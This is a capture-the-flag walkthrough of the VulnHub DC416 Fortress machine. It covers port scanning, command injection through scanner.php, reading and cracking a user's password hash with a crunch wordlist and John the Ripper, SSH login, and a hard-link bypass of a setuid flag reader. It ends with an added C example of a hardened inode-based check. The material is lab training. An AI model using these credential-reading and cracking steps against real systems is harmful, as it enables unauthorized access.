DC416 CTF CHALLENGES [FORTRESS]
Location
https://download.vulnhub.com/dc416-2016/dc416-fortress.ova
Introduction
This is one of four virtual machines that were created by members of the VulnHub CTF Team for DefCon Toronto’s first offline CTF.
This machine was created by superkojiman.
Each machine has a landing page on port 80 which describes the number of flags it has, along with any additional rules or hints.
Getting Started
First, an nmap scan.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.3

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-10 09:56 CET
Nmap scan report for 192.168.171.3
Host is up (0.00049s latency).
Not shown: 65532 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2 (FreeBSD 20160310; protocol 2.0)
| ssh-hostkey:
|   2048 3a:34:82:2b:86:e3:2a:e4:2c:34:18:85:f9:94:7c:69 (RSA)
|_  256 78:79:e2:ed:27:e3:43:77:0b:07:d2:03:bb:7f:c1:02 (ECDSA)
80/tcp  open  http     Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
|_http-server-header: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27
|_http-title: Did not follow redirect to https://192.168.171.3/
443/tcp open  ssl/http Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27
|_http-title: fortress
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=ON/countryName=CA
| Not valid before: 2016-11-05T05:05:36
|_Not valid after:  2017-11-05T05:05:36
|_ssl-date: TLS randomness does not represent time
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.63 seconds
Looks like there are 3 open ports, and port 80 is redirecting to port 443.
I’ll try and do some banner grabbing before I start with port 80.
Nothing there but the info I already got from the nmap scan.
When visiting the website on port 80 I get redirected to port 443. Here the rules of engagement are noted.
To enumerate some directories I use dirsearch, which finds /scanner.php.
┌─[n13mant@planetmars]─[~/Desktop/dirsearch]
└──╼ $python3 dirsearch.py -u "https://192.168.171.3/" -e php -w /home/n13mant/Documents/dirsearch/db/dicc.txt -f -F -r -x 403,404 -t 10

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 9914

Error Log: /home/n13mant/Documents/dirsearch/logs/errors-17-01-10_13-26-57.log

Target: https://192.168.171.3/

[13:26:57] Starting:
[13:27:32] 200 -  561B - /index.html
[13:27:45] 200 -  370B - /scanner.php

Task Completed
Looks like an excellent vector for remote code execution (RCE).
Because I want to know if I can append some arbitrary code, I start to add some chars and see what the result is. After I use the pipe char (|) I get a pat on the back – much appreciated LOL.
Because I wanted to know what was happening behind the scenes, I used Burp Suite to capture the traffic. From there I sent the request to the Repeater and tried to execute code by bypassing the filter. After some time I found out that a simple break did the trick.
Next I’m using the command ls -aRl.
drwxr-xr-x  4 root  wheel    512 Nov  9 20:24 .
drwxr-xr-x  6 root  wheel    512 Nov  9 19:58 ..
-rw-r--r--  1 root  wheel    561 Nov  8 23:51 index.html
drwxr-xr-x  2 root  wheel    512 Nov  9 20:22 k1ngd0m_k3yz
-rw-r--r--  1 root  wheel  44867 Nov  4 00:46 logo.png
drwxr-xr-x  2 root  wheel    512 Nov  9 20:22 s1kr3t
-rw-r--r--  1 root  wheel    759 Nov  5 00:50 scanner.php
-rw-r--r--  1 root  wheel    612 Nov  4 01:01 styles.css

./k1ngd0m_k3yz:
total 32
drwxr-xr-x  2 root  wheel  512 Nov  9 20:22 .
drwxr-xr-x  4 root  wheel  512 Nov  9 20:24 ..
-rw-r--r--  1 root  wheel  157 Nov  9 19:53 master
-rw-r--r--  1 root  wheel   47 Nov  9 19:54 passwd

./s1kr3t:
total 24
drwxr-xr-x  2 root  wheel  512 Nov  9 20:22 .
drwxr-xr-x  4 root  wheel  512 Nov  9 20:24 ..
-rw-r--r--  1 root  wheel   31 Nov  4 18:08 flag.txt
cat ./s1kr3t/flag.txt
FLAG{n0_one_br3aches_teh_f0rt}
cat ./k1ngd0m_k3yz/master
craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh
cat ./k1ngd0m_k3yz/passwd
craven:*:1002:1002:User &:/home/craven:/bin/sh
So I got the first flag and the passwd and shadow file of user “craven”.
First I’m going to gather the location of the remaining flags.
find / -name "flag*"
/usr/local/www/apache24/data/s1kr3t/flag.txt
/usr/home/vulnhub/flag.txt
/usr/home/craven/flag.txt
ls -lah /usr/home/vulnhub
drwxr-xr-x  2 vulnhub  vulnhub   512B Nov  8 20:27 .
drwxr-xr-x  4 root     wheel     512B Nov  5 01:59 ..
-rw-r--r--  1 vulnhub  vulnhub   1.0K Nov  1 23:43 .cshrc
-rw-r--r--  1 vulnhub  vulnhub   254B Nov  1 23:43 .login
-rw-r--r--  1 vulnhub  vulnhub   163B Nov  1 23:43 .login_conf
-rw-------  1 vulnhub  vulnhub   379B Nov  1 23:43 .mail_aliases
-rw-r--r--  1 vulnhub  vulnhub   336B Nov  1 23:43 .mailrc
-rw-r--r--  1 vulnhub  vulnhub   802B Nov  1 23:43 .profile
-rw-------  1 vulnhub  vulnhub   281B Nov  1 23:43 .rhosts
-rw-r--r--  1 vulnhub  vulnhub   978B Nov  1 23:43 .shrc
-r--------  1 vulnhub  vulnhub    26B Nov  8 20:08 flag.txt
-rwsr-xr-x  1 vulnhub  vulnhub   8.8K Nov  8 20:15 reader
ls -lah /usr/home/craven
drwxr-xr-x  2 craven  craven   512B Nov  9 19:58 .
drwxr-xr-x  4 root    wheel    512B Nov  5 01:59 ..
-rw-r--r--  1 craven  craven   1.0K Nov  5 01:59 .cshrc
-rw-------  1 craven  craven     5B Nov  7 20:24 .gdb_history
-rw-r--r--  1 craven  craven    60B Nov  7 20:36 .gdbinit
-rw-r--r--  1 craven  craven   254B Nov  5 01:59 .login
-rw-r--r--  1 craven  craven   163B Nov  5 01:59 .login_conf
-rw-------  1 craven  craven   379B Nov  5 01:59 .mail_aliases
-rw-r--r--  1 craven  craven   336B Nov  5 01:59 .mailrc
-rw-r--r--  1 craven  craven   802B Nov  5 01:59 .profile
-rw-------  1 craven  craven   281B Nov  5 01:59 .rhosts
-rw-r--r--  1 craven  craven   978B Nov  5 01:59 .shrc
-r--------  1 craven  craven    46B Nov  6 01:30 flag.txt
-rw-r--r--  1 craven  craven   119B Nov  5 02:23 hint.txt
-rw-r--r--  1 craven  craven    77B Nov  5 02:20 reminders.txt
So the flags I can’t read yet, but there are some files I can.
cat /usr/home/craven/hint.txt
Keep forgetting my password, so I made myself a hint. Password is three digits followed by my pet's name and a symbol.
cat /usr/home/craven/reminders.txt
To buy:
* skim milk
* organic free-run eggs
* dog bone for qwerty
* sriracha
So… the name of the pet is probably “qwerty”, leaving me to create a list with crunch.
┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $crunch 10 10 -t %%%qwerty^ -o craven.lst
Crunch will now generate the following amount of data: 363000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 33000

crunch: 100% completed generating output
Now to load this up with John the Ripper.
┌─[n13mant@planetmars]─[~/Desktop/john]
└──╼ $unshadow ./etc/passwd ./etc/shadow > mypasswd
┌─[n13mant@planetmars]─[~/Desktop/john]
└──╼ $john mypasswd --wordlist=craven.lst
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
931qwerty?       (craven)
1g 0:00:00:57 DONE (2017-01-10 14:46) 0.01740g/s 535.9p/s 535.9c/s 535.9C/s 930qwerty?..932qwerty>
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[✗]─[n13mant@planetmars]─[~/Desktop/john]
└──╼ $john --show mypasswd
craven:931qwerty?:1002:1002:User &:/home/craven:/bin/sh

1 password hash cracked, 0 left
Now that I have the password it’s time to ssh my way in as “craven”.
┌─[n13mant@planetmars]─[~]
└──╼ $ssh craven@192.168.171.3 -p 22
The authenticity of host '192.168.171.3 (192.168.171.3)' can't be established.
ECDSA key fingerprint is SHA256:ekOYTIfPK3fRGCYD3FHMkmfiN13ShRbk7a7gF0CIQd8.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/n13mant/.ssh/known_hosts).
Password for craven@fortress:
Last login: Tue Nov  8 19:52:08 2016 from 192.168.208.1
FreeBSD 11.0-RELEASE-p1 (GENERIC) #0 r306420: Thu Sep 29 01:43:23 UTC 2016

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.
Any user that is a member of the wheel group can use "su -" to simulate
a root login. You can add a user to the wheel group by editing /etc/group.
		-- Konstantinos Konstantinidis <kkonstan@duth.gr>
First I take my second flag.
$ pwd
/usr/home/craven
$ ls -lah
total 60
drwxr-xr-x  2 craven  craven   512B Nov  9 19:58 .
drwxr-xr-x  4 root    wheel    512B Nov  5 01:59 ..
-rw-r--r--  1 craven  craven   1.0K Nov  5 01:59 .cshrc
-rw-------  1 craven  craven     5B Nov  7 20:24 .gdb_history
-rw-r--r--  1 craven  craven    60B Nov  7 20:36 .gdbinit
-rw-r--r--  1 craven  craven   254B Nov  5 01:59 .login
-rw-r--r--  1 craven  craven   163B Nov  5 01:59 .login_conf
-rw-------  1 craven  craven   379B Nov  5 01:59 .mail_aliases
-rw-r--r--  1 craven  craven   336B Nov  5 01:59 .mailrc
-rw-r--r--  1 craven  craven   802B Nov  5 01:59 .profile
-rw-------  1 craven  craven   281B Nov  5 01:59 .rhosts
-rw-r--r--  1 craven  craven   978B Nov  5 01:59 .shrc
-r--------  1 craven  craven    46B Nov  6 01:30 flag.txt
-rw-r--r--  1 craven  craven   119B Nov  5 02:23 hint.txt
-rw-r--r--  1 craven  craven    77B Nov  5 02:20 reminders.txt
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}
Next stop is user “vulnhub” and his flag.
$ cd vulnhub
$ ls -lah
total 56
drwxr-xr-x  2 vulnhub  vulnhub   512B Nov  8 20:27 .
drwxr-xr-x  4 root     wheel     512B Nov  5 01:59 ..
-rw-r--r--  1 vulnhub  vulnhub   1.0K Nov  1 23:43 .cshrc
-rw-r--r--  1 vulnhub  vulnhub   254B Nov  1 23:43 .login
-rw-r--r--  1 vulnhub  vulnhub   163B Nov  1 23:43 .login_conf
-rw-------  1 vulnhub  vulnhub   379B Nov  1 23:43 .mail_aliases
-rw-r--r--  1 vulnhub  vulnhub   336B Nov  1 23:43 .mailrc
-rw-r--r--  1 vulnhub  vulnhub   802B Nov  1 23:43 .profile
-rw-------  1 vulnhub  vulnhub   281B Nov  1 23:43 .rhosts
-rw-r--r--  1 vulnhub  vulnhub   978B Nov  1 23:43 .shrc
-r--------  1 vulnhub  vulnhub    26B Nov  8 20:08 flag.txt
-rwsr-xr-x  1 vulnhub  vulnhub   8.8K Nov  8 20:15 reader
$ file reader
reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped
$ ltrace reader
-sh: ltrace: not found
$ strings reader
/libexec/ld-elf.so.1
FreeBSD
FreeBSD
_Jv_RegisterClasses
libc.so.7
__progname
environ
printf
lstat
fopen
puts
strstr
sleep
_init_tls
fclose
memset
fgets
atexit
_end
FBSD_1.0
AWAVAUATSPI
ffff.
u*UH
fff.
%s [file to read]
Checking file type...
Symbolic links not allowed!
Checking if flag file...
flag
Nope. Can't let you have the flag.
Great! Printing file contents...
Win, here's your flag:
This time I run the program.
$ ./reader
./reader [file to read]
$ ./reader flag.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.
Let’s do some testing first.
$ echo "testing" > /tmp/test.txt
$ ./reader /tmp/test.txt
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
testing
$ echo 'not the real flag' > /tmp/flag.txt
$ ./reader /tmp/flag.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.
So it’s basically just checking the filename. If the name contains “flag” it denies access; otherwise it echoes the content.
To bypass this mechanism I’m going to make a symbolic link to the real “flag.txt”.
$ ln /usr/home/vulnhub/flag.txt /tmp/needo
$ ./reader /tmp/needo
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
FLAG{its_A_ph0t0_ph1ni5h}
And there is the final flag.
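Note that the ln command above has no -s, so /tmp/needo is a hard link: it shares the flag's inode under a different name, which is why neither the binary's symlink check (lstat) nor its name check (strstr on "flag") catches it. The following is an added example written for this page, not the challenge's own reader source: a hardened version of the check that identifies the protected file by device and inode of the descriptor it actually opened, plus a constructed fixture (temporary directory, file names and flag string are all made up here) that reproduces the plain-file, hard-link and symlink cases.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
enum verdict { ALLOW = 0, DENY_SYMLINK = 1, DENY_PROTECTED = 2, DENY_OPEN = 3, CHECK_ERROR = -1 };
/* Decide whether `path` may be printed. Unlike a strstr() match on the name, the
 * protected file is identified by (st_dev, st_ino), so a hard link under any other
 * name still resolves to the same inode and is refused. On ALLOW, *fd_out is the open fd. */
int check_readable(const char *path, const char *protected_path, int *fd_out)
{
    struct stat prot, st;
    if (stat(protected_path, &prot) != 0) return CHECK_ERROR;
    /* O_NOFOLLOW refuses a symlink as the final component: ELOOP on Linux, EMLINK on FreeBSD. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return (errno == ELOOP || errno == EMLINK) ? DENY_SYMLINK : DENY_OPEN;
    /* fstat() the descriptor we actually opened: no check-then-use race on the path string. */
    if (fstat(fd, &st) != 0) { close(fd); return CHECK_ERROR; }
    if (st.st_dev == prot.st_dev && st.st_ino == prot.st_ino) { close(fd); return DENY_PROTECTED; }
    *fd_out = fd; return ALLOW;
}
/* Constructed fixture (not from the VM): a mkdtemp() directory holding flag.txt (protected),
 * test.txt (harmless), needo (hard link to flag.txt, the bypass shown above) and sym (symlink
 * to flag.txt). Returns the verdict check_readable() gives for `entry` in that directory. */
int verdict_for(const char *entry)
{
    static char dir[] = "/tmp/reader.XXXXXX"; static int ready = 0;
    char flag[512], path[512];
    if (!ready) {
        if (mkdtemp(dir) == NULL) return CHECK_ERROR;
        snprintf(flag, sizeof flag, "%s/flag.txt", dir);
        snprintf(path, sizeof path, "%s/test.txt", dir);
        FILE *f = fopen(flag, "w");
        if (!f || fputs("FLAG{constructed_example}\n", f) < 0 || fclose(f)) return CHECK_ERROR;
        f = fopen(path, "w");
        if (!f || fputs("testing\n", f) < 0 || fclose(f)) return CHECK_ERROR;
        snprintf(path, sizeof path, "%s/needo", dir);
        if (link(flag, path) != 0) return CHECK_ERROR;      /* hard link: same inode, new name */
        snprintf(path, sizeof path, "%s/sym", dir);
        if (symlink(flag, path) != 0) return CHECK_ERROR;   /* symlink: rejected by O_NOFOLLOW */
        ready = 1;
    }
    snprintf(flag, sizeof flag, "%s/flag.txt", dir);
    snprintf(path, sizeof path, "%s/%s", dir, entry);
    int fd = -1, v = check_readable(path, flag, &fd);
    if (v == ALLOW) close(fd);
    return v;
}
```

A setuid reader built this way would still be wise to drop privileges before printing, but the inode comparison alone closes the name-based and hard-link gaps this binary has.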